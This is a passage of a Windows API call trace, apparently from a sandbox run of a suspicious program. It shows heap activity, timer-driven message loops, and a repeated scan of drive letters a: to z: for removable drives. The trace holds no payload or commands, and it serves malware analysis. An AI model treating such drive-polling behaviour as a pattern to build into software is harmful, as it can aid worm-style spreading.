| out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.183] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0215.184] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.184] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.184] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.184] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.184] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.184] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.184] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.184] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.185] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.185] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.185] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.185] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.185] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.185] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.185] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.186] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.186] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.186] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.186] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.186] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.186] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.186] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.187] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.187] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.187] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.188] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.188] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0215.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0215.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.188] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.189] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.189] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.189] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.189] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.189] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.189] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.189] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.189] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.189] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0215.189] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0215.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.189] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0215.189] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0215.189] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.190] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0215.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.190] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.190] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.190] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.190] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.191] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.191] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.191] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.191] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.191] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.191] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.191] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.191] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.191] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.192] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.192] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.192] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.192] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.192] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.192] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.193] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.193] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.193] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.193] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.193] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.193] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.194] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.194] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.194] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.194] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.194] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.194] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.194] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.195] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0215.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0215.196] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0215.196] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.196] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.196] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.197] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0215.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0215.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.198] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.198] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.198] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.198] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.198] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.198] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.199] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.199] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.199] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.199] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.199] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.199] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.200] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.200] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.200] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.200] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.200] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.201] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.201] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.201] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.201] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.201] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.201] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.201] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.202] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.202] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.202] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0215.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.203] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0215.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0215.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0215.220] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.220] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.220] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.220] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.220] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.220] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0215.220] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.220] HeapFree (in: 